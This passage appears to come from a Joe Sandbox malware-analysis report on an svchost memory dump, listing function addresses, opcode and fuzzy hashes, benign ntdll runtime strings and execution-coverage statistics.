                                                                                                                      Function 03072FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 47afe021aebfc917bddc87b01181fd5393b9f69e753dd3badc6a1f1776a78216
                                                                                                                      • Instruction ID: 03b7dc2d073b18c54f35ab2ab09424512d4a4b3285f8a516415e83477771e312
                                                                                                                      • Opcode Fuzzy Hash: 47afe021aebfc917bddc87b01181fd5393b9f69e753dd3badc6a1f1776a78216
                                                                                                                      • Instruction Fuzzy Hash: 1A900221212C0442E200B6688C54B47004687D0303F95C115A0554558CCA1589615521
                                                                                                                      Function 03072E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ef01c826e4f2d491ced91db91d96c5f33a0271ec591378117fc246f367cf24cb
                                                                                                                      • Instruction ID: 53e1e59cc55c36c8eb81471fc9d623e8d898e9c8c1f12b73d69f62b399d5d0d6
                                                                                                                      • Opcode Fuzzy Hash: ef01c826e4f2d491ced91db91d96c5f33a0271ec591378117fc246f367cf24cb
                                                                                                                      • Instruction Fuzzy Hash: D590022130240802E102B2588454646004AC7D1345FD5C012E1824559D87258A53A132
                                                                                                                      Function 03072E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 39a27428b8f1fdbe3449d8ea03080ed833af42c4b7004e16f833bf3261f6114e
                                                                                                                      • Instruction ID: 978006cc818ad45688e9bf3326130e6f60e5a08615a408aec7e73aba200f319b
                                                                                                                      • Opcode Fuzzy Hash: 39a27428b8f1fdbe3449d8ea03080ed833af42c4b7004e16f833bf3261f6114e
                                                                                                                      • Instruction Fuzzy Hash: 2090022160240902E101B2588444656004B87D0341FD5C022A1424559ECB258A92A131
                                                                                                                      Function 03072EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e98725506c98022ba5deacef4cc9964df7cd60aa99bf7288232664f7e78c8b65
                                                                                                                      • Instruction ID: 59181bd4e2d6fd29544c31fa701e200b18705e20aa5500c56e524898d07dc6d6
                                                                                                                      • Opcode Fuzzy Hash: e98725506c98022ba5deacef4cc9964df7cd60aa99bf7288232664f7e78c8b65
                                                                                                                      • Instruction Fuzzy Hash: FA90027120240802E140B2588444786004687D0301F95C011A5464558E87598ED56665
                                                                                                                      Function 03072EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ef96ed259ca64e9fc2418f0eacf27e677f9433b92b9ec748356f8cbe9a1dc667
                                                                                                                      • Instruction ID: 3b6bb0c34a6ba2ec1a1f678cdc35a72b6daae2aa2892e3d3dcdf912f82107a26
                                                                                                                      • Opcode Fuzzy Hash: ef96ed259ca64e9fc2418f0eacf27e677f9433b92b9ec748356f8cbe9a1dc667
                                                                                                                      • Instruction Fuzzy Hash: 8690026120280803E140B6588844647004687D0302F95C011A2464559E8B298D516135
                                                                                                                      Function 03072D00 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b0b24b08cd9b73036ac379a5c449e85c6081021d73db1d86b1e01f7cdc8b93ac
                                                                                                                      • Instruction ID: 0bc5dc4228b72584672d1f4bbae8f9f53ef7260f8db34b8434486fd1bd405ca5
                                                                                                                      • Opcode Fuzzy Hash: b0b24b08cd9b73036ac379a5c449e85c6081021d73db1d86b1e01f7cdc8b93ac
                                                                                                                      • Instruction Fuzzy Hash: 9290022120644842E100B6589448A46004687D0305F95D011A1464599DC7358951A131
                                                                                                                      Function 03072D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 062179a3dbf3215bde3c83ad06605c2c06b336800e7d10bc57b7e40d42a9d8ed
                                                                                                                      • Instruction ID: ab0f1fbdc6f89c7dc8aca5e5c922a93baeac8626dd8c408127e529d253689b7b
                                                                                                                      • Opcode Fuzzy Hash: 062179a3dbf3215bde3c83ad06605c2c06b336800e7d10bc57b7e40d42a9d8ed
                                                                                                                      • Instruction Fuzzy Hash: B890022921340402E180B258944864A004687D1302FD5D415A041555CCCA1589695321
                                                                                                                      Function 03073D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e7ee507783092ba30be6069646c793fb114ad41006c3fffcf7a0911945683dbe
                                                                                                                      • Instruction ID: 78b4e79fd1b16aa4bb57255434fa8ce5aefa62395f07a379fa2cd7aea63590db
                                                                                                                      • Opcode Fuzzy Hash: e7ee507783092ba30be6069646c793fb114ad41006c3fffcf7a0911945683dbe
                                                                                                                      • Instruction Fuzzy Hash: 3D90023120340542A540B3589844A8E414687E1302BD5D415A0415558CCA1489615221
                                                                                                                      Function 03072D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6eced130dffc702fe6f3e77ff98dc75140229b264900807e194e1423ea3c7460
                                                                                                                      • Instruction ID: c6734bda95344e59599846dbd64c33f696c4fd329d6da1672c993ea8dd9f6e79
                                                                                                                      • Opcode Fuzzy Hash: 6eced130dffc702fe6f3e77ff98dc75140229b264900807e194e1423ea3c7460
                                                                                                                      • Instruction Fuzzy Hash: BF90022130240403E140B25894586464046D7E1301F95D011E0814558CDA1589565222
                                                                                                                      Function 03073D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 52b3526746390bf4d0e5d58bf27eba5de1f4f22a6abbd35f28c875f5b8991d77
                                                                                                                      • Instruction ID: 7d5c2ee8df3fd87a442fced2f2bf09b1ffe7fe3f6b6e38da27442eb94cb4f563
                                                                                                                      • Opcode Fuzzy Hash: 52b3526746390bf4d0e5d58bf27eba5de1f4f22a6abbd35f28c875f5b8991d77
                                                                                                                      • Instruction Fuzzy Hash: 6490023520240802E510B2589844686008787D0301F95D411A082455CD875489A1A121
                                                                                                                      Function 03072DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 668ef1cf4b401e0d3d8e12bb3cf605d23c2aec6012e464b8fe41d16ef49f2796
                                                                                                                      • Instruction ID: d9e062dcc6b90e0d271e18a4c10fad491bbdf1ecf487d0e8e18833c814d1d5b6
                                                                                                                      • Opcode Fuzzy Hash: 668ef1cf4b401e0d3d8e12bb3cf605d23c2aec6012e464b8fe41d16ef49f2796
                                                                                                                      • Instruction Fuzzy Hash: 6E90023124240802E141B2588444646004A97D0341FD5C012A0824558E87558B56AA61
                                                                                                                      Function 03072DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c52917ffc51e59714fb4af53e2fa364a478908248d0a18dff09608e6ada1b66e
                                                                                                                      • Instruction ID: b4de34f3f80a891febf8bb8f0285f8965509446860203a28027176e33da0a03d
                                                                                                                      • Opcode Fuzzy Hash: c52917ffc51e59714fb4af53e2fa364a478908248d0a18dff09608e6ada1b66e
                                                                                                                      • Instruction Fuzzy Hash: 86900221243445526545F2588444547404797E03417D5C012A1814954C86269956D621
                                                                                                                      Function 03072C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4760b6e73a80a4d2383849cfdc01fa10067def3114f633e339cc56359abd7e35
                                                                                                                      • Instruction ID: c975f90432bedbf3e330998a409d7d30fdae0cf2c907d4e67e36df3829efe30c
                                                                                                                      • Opcode Fuzzy Hash: 4760b6e73a80a4d2383849cfdc01fa10067def3114f633e339cc56359abd7e35
                                                                                                                      • Instruction Fuzzy Hash: 6190023120240C42E100B2588444B86004687E0301F95C016A0524658D8715C9517521
                                                                                                                      Function 03072CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 61f04b5bef9c70e658d54790893ffe949106e2065d6732cb5994ddc058554ba5
                                                                                                                      • Instruction ID: 91c583f3f708e6fbe1ad4dc74aee16e99e956f0a51ee552c465b15ef6b06fa83
                                                                                                                      • Opcode Fuzzy Hash: 61f04b5bef9c70e658d54790893ffe949106e2065d6732cb5994ddc058554ba5
                                                                                                                      • Instruction Fuzzy Hash: 2F90023120240802E100B6989448686004687E0301F95D011A5424559EC76589916131
                                                                                                                      Function 03072CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bdbcd088faca9f3c05814db7a46bf6bf29a746507b89a9c3545c636118321c7b
                                                                                                                      • Instruction ID: 6efa049e2cd7bab178828c8ec39d47d2b40bb7367f216bd2368c40e8e80b6f1e
                                                                                                                      • Opcode Fuzzy Hash: bdbcd088faca9f3c05814db7a46bf6bf29a746507b89a9c3545c636118321c7b
                                                                                                                      • Instruction Fuzzy Hash: CF90022160640802E140B2589458746005687D0301F95D011A0424558DC7598B5566A1
                                                                                                                      Function 03072CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d7bfd1d67c067e527357ab28a65b56ba167ca38312b873b8411bd24fa1830154
                                                                                                                      • Instruction ID: 0ce7ff1fb4659e164e958a89da5dfcfd2d098133f1c4fb30ba6b3343c487472b
                                                                                                                      • Opcode Fuzzy Hash: d7bfd1d67c067e527357ab28a65b56ba167ca38312b873b8411bd24fa1830154
                                                                                                                      • Instruction Fuzzy Hash: F190023120240803E100B2589548747004687D0301F95D411A082455CDD75689516121
                                                                                                                      Function 03072C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                      • Instruction ID: aa0057e010792f307a6ad3e6794302dc3919de950015b0dfa45c354223d9da06
                                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Function 03072890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: 7571d4bde9114c4bfa716bc39e82b9ad540c0fad8759619d06ce9268a5617136
                                                                                                                      • Instruction ID: 3dd43c5e8df5d4a541ff5e8d49eaa179178be37ac947891ec34abaa15eb6841b
                                                                                                                      • Opcode Fuzzy Hash: 7571d4bde9114c4bfa716bc39e82b9ad540c0fad8759619d06ce9268a5617136
                                                                                                                      • Instruction Fuzzy Hash: 8851E9B5F02556BFCB60DBAC889057EF7FCBB48200B188569E4A5D7681D234DE40CBA4
                                                                                                                      Function 03067630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 030A4725
                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 030A4742
                                                                                                                      • ExecuteOptions, xrefs: 030A46A0
                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 030A4655
                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 030A46FC
                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 030A4787
                                                                                                                      • Execute=1, xrefs: 030A4713
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                      • API String ID: 0-484625025
                                                                                                                      • Opcode ID: c965e57698fedb32bb65b30a8b9c00417ad74d81fea22995a627e93a9b9e56e0
                                                                                                                      • Instruction ID: 78dcd32c70aaf640c9cab70d964d0d71dc444305b0533e176ea2e15831aeb794
                                                                                                                      • Opcode Fuzzy Hash: c965e57698fedb32bb65b30a8b9c00417ad74d81fea22995a627e93a9b9e56e0
                                                                                                                      • Instruction Fuzzy Hash: 16511B35A023197ADF25EBA9EC45FEE73B8EF44704F0404A9E505AB191D7B09A41CF51
                                                                                                                      Function 0307B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-$0$0
                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction ID: f5ceeaa8e5a1b03da3c5f7c22b5059c6b783afc11a4e2b0d857a0c3f76189cf8
                                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction Fuzzy Hash: 4081AE70E072499FDF64CE68C8917FEBBF5AF45310F1C865AD861AB390C6349941CB58
                                                                                                                      Function 0305F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RTL: Re-Waiting, xrefs: 030A031E
                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 030A02E7
                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 030A02BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                      • API String ID: 0-2474120054
                                                                                                                      • Opcode ID: aa5b3dd0ed81022b3e495cd044bdbb230278ef5cfef707194830906af20f7347
                                                                                                                      • Instruction ID: 2db8c7809eccb387bbab7755e55e440a5e1c3268c69996faf324d820e075a062
                                                                                                                      • Opcode Fuzzy Hash: aa5b3dd0ed81022b3e495cd044bdbb230278ef5cfef707194830906af20f7347
                                                                                                                      • Instruction Fuzzy Hash: 7BE1CD35606B46DFD764CF28C884B6BB7E4BB88314F184A6DF8A58B2D0D778D844CB42
                                                                                                                      Function 0306BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RTL: Re-Waiting, xrefs: 030A7BAC
                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 030A7B7F
                                                                                                                      • RTL: Resource at %p, xrefs: 030A7B8E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 0-871070163
                                                                                                                      • Opcode ID: 1bd38d0dfefade9024388b76cb4247a7291fe0d779d0a202cee1180e11bde72e
                                                                                                                      • Instruction ID: 5c68524538c811c45ac33e6c267ec5267953106bd79f41ab44d2f7c244cb31fb
                                                                                                                      • Opcode Fuzzy Hash: 1bd38d0dfefade9024388b76cb4247a7291fe0d779d0a202cee1180e11bde72e
                                                                                                                      • Instruction Fuzzy Hash: DD4126757027029FC724DF6ACC40B6AB7E9EF88710F044A2DF85ADB290DB71E4058B91
                                                                                                                      Function 0306B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030A728C
                                                                                                                      Strings
                                                                                                                      • RTL: Re-Waiting, xrefs: 030A72C1
                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 030A7294
                                                                                                                      • RTL: Resource at %p, xrefs: 030A72A3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                      • Opcode ID: ed38c1ad9db818f2e3b0b3d77d36f88683240072877618fcb95b8c8b661dcc27
                                                                                                                      • Instruction ID: 1a106c665ac3f352fff669199b654399dcfb32c0e85686191612411cfb348299
                                                                                                                      • Opcode Fuzzy Hash: ed38c1ad9db818f2e3b0b3d77d36f88683240072877618fcb95b8c8b661dcc27
                                                                                                                      • Instruction Fuzzy Hash: 6041F275702706ABC720DEA9CC41BAAB7E5FF84B10F148A29F855EB640DB21E81287D1
                                                                                                                      Function 03077D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-
                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction ID: abd2e0749aab9e49970beb63c65aea8394311e1fb8954c30f016bce8e0254830
                                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction Fuzzy Hash: 3691D670E0220A9BDF64DF69C9857BEB7F5FF44BA0F18851AE865E72C0D73089418768
                                                                                                                      Function 03039126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$@
                                                                                                                      • API String ID: 0-1194432280
                                                                                                                      • Opcode ID: eb1fcc16ae508bd7c970d6c938cc0dc52c47e1f6cfdc15088a9195b025f5fd8f
                                                                                                                      • Instruction ID: f95edb3e29bdc727553f147ea92e2464b4e180261d036fb99a993f21c44497c0
                                                                                                                      • Opcode Fuzzy Hash: eb1fcc16ae508bd7c970d6c938cc0dc52c47e1f6cfdc15088a9195b025f5fd8f
                                                                                                                      • Instruction Fuzzy Hash: 14813876D01269EBDB35DF54CC44BEEB7B8AB48710F0445EAA919B7280D7709E80CFA0

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:3.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                      Signature Coverage:2.2%
                                                                                                                      Total number of Nodes:447
                                                                                                                      Total number of Limit Nodes:72
